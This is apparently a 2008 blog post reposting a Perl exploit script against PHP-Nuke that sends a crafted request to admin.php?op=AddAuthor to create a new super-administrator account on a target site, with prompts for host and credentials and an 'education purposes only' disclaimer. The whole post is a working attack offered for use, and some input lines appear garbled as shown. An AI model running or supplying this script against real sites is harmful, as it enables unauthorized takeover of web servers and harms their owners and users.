31 Aralık 2008 Çarşamba

PHP-NUKE all versions add admin exploit

use LWP::UserAgent;

print "========================================\n";
print " PHP-NUKE all versions add admin exploit\n";
print " Exploit coded by matrix_killer\n";
print " Greetz to all omega-team members\n";
print " See the sourece for more information\n";
print "========================================\n";

print "Enter host: "; #example:www.host.org

my $host=;

chomp ($host);

print "Enter username: "; #example:Lamer

my $user=;

chomp ($user);

print "Enter pass: "; #example:lamer

my $pass=;

chomp ($pass);

print "Enter base64 username and md5 hash: ";

my $base64=;

chomp ($base64);

my $ua = new LWP::UserAgent;
$ua->proxy(['http'] => ''); #setup here the proxy and the port
#Change the base64 text to the base 64 username and password
my $xpl="http://$host/admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&add_email=hacked@rooted.com&add_radminsuper=1&admin=$base64";

my $res = $ua->request(new HTTP::Request POST => $xpl);
print "DONE !!! Now go to $host/admin.php and login as $user for username and $pass for password\n";

#For questions send me a e-mail to matrix_k@abv.bg
#I'm not responsible for the damage that you will make with this exploit.The exploit is wrighten for education purposes only !

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